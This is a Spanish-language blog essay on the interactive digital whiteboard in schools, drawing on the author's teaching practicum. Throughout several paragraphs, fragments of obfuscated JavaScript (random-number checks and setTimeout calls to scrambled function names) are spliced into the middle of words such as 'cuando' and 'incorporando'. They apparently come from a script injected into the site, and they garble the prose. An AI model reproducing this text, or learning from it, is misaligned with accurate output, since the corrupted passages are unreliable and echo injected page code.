EL AULA DEL SIGLO XXI

Autora: Rocío Lobato Rodríguez

          Las Tecnologías de la Información y de la Comunicación (TIC) están configurandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, día a día, en nuestro entorno, un marco social distinto, que repercute en la idea de que si los modos de comportamiento social cambian, debe cambiar también la educación. Por tanto, es necesaria una transformación urgente en la comunidad educativa, para que pueda acomodarse a las exigencias de la actual sociedad en la que estamos inmersos.

          Ni que decir tiene que al uso de la tiza y la pizarra tradicional se está incorporandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando otro elemento más sofisticado y adaptado a las necesidades de la comunidad de hoy: la pizarra digital. No obstante, hemos de tener presente que no siempre serán necesarios métodos basados en recursos multimedia y que, en muchas ocasiones, la metodología pedagógica más tradicional será la que mejores resultados proporcione.

          Todos hemos escuchado alguna vez, tanto a políticos como a personal del cuerpo docente (maestros, profesores…), hablar de la pizarra digital como medio tecnológico e interactivo de enseñanza-aprendizaje en el aula de hoy en día. Pero ¿qué es la pizarra digital interactiva?

          Ruiz Rey, F. y Mármol Martínez, M. hablan de que “cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando además del ordenador y el videoproyector disponemos también de un tablero de carácter interactivo, estamos ante una pizarra digital interactiva, que nos permite escribir directamente sobre ella y controlar los programas informáticos con un puntero e incluso con los dedos”.

           La pizarra digital, por tanto, es una ventana amplia abierta al mundo en el aula, con un gran abanico de posibilidades de acceso a una cantidad inmensa de conocimiento y que, con su variada diversidad de formatos, constituye la principal fuente de innovación. A la vez, es una distribuidora de la cooperación, pues posibilita compartir y comentar todo tipo de materiales, a la par que permite comunicarse e interactuar en directo desde clase con otras personas.

          La primera vez que tuve la oportunidad de observar y utilizar una pizarra digital interactiva fue en mi periodo de prácticas de Magisterio, allá por el año 2007, año en el que yo escuchaba eso de “la pizarra digital” en el aula y que yo podía llegar a deducir más o menos, por su nomenclatura, cómo podía ser físicamente,  pero nunca pensé que se podían realizar tantas actividades en ella.

          En el centro donde yo realicé mis prácticas únicamente había una pizarra digital, ubicada en un aula específica para realizar actividades puntuales, por lo que era necesario establecer un horario y hacer turnos. Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando entré en el aula, rápidamente mis ojos se volvieron hacia una parte de la habitación donde había colgado un panel blanco: “ésta es la nueva pizarra”, me comentó mi profesora de prácticas. Entonces nos sentamos todos y la profesora puso en marcha aquel panel. Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando ya estaba encendido, comenzamos la clase. Aquello fue algo totalmente diferente al tipo de clase al que yo estaba acostumbrada a asistir; toda una revolución dentro del ámbito educativo: Una clase en la que el protagonista era el alumno y no el profesor, como sucedía en la escuela tradicional; una clase en la que se proporcionaba una interacción entre alumnos y entre alumno-profesor y una clase en la que la motivación llegaba a su nivel más alto.

          Ahora no nos sorprendemos al oír esas tres palabras: Pizarra Digital Interactiva, o al verlas escritas en algún artículo o en algún documento educativo, pero para ello ha sido necesario que en tres años la comunidad educativa haya modificado su visión de enseñanza-aprendizaje.

          Ya no se trata de enseñar solamente a los alumnos a aprender, sino también a buscar y a relacionar entre sí las informaciones, es decir, a que sean capaces de transformar la información en conocimiento.

 

 Bibliografía:

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.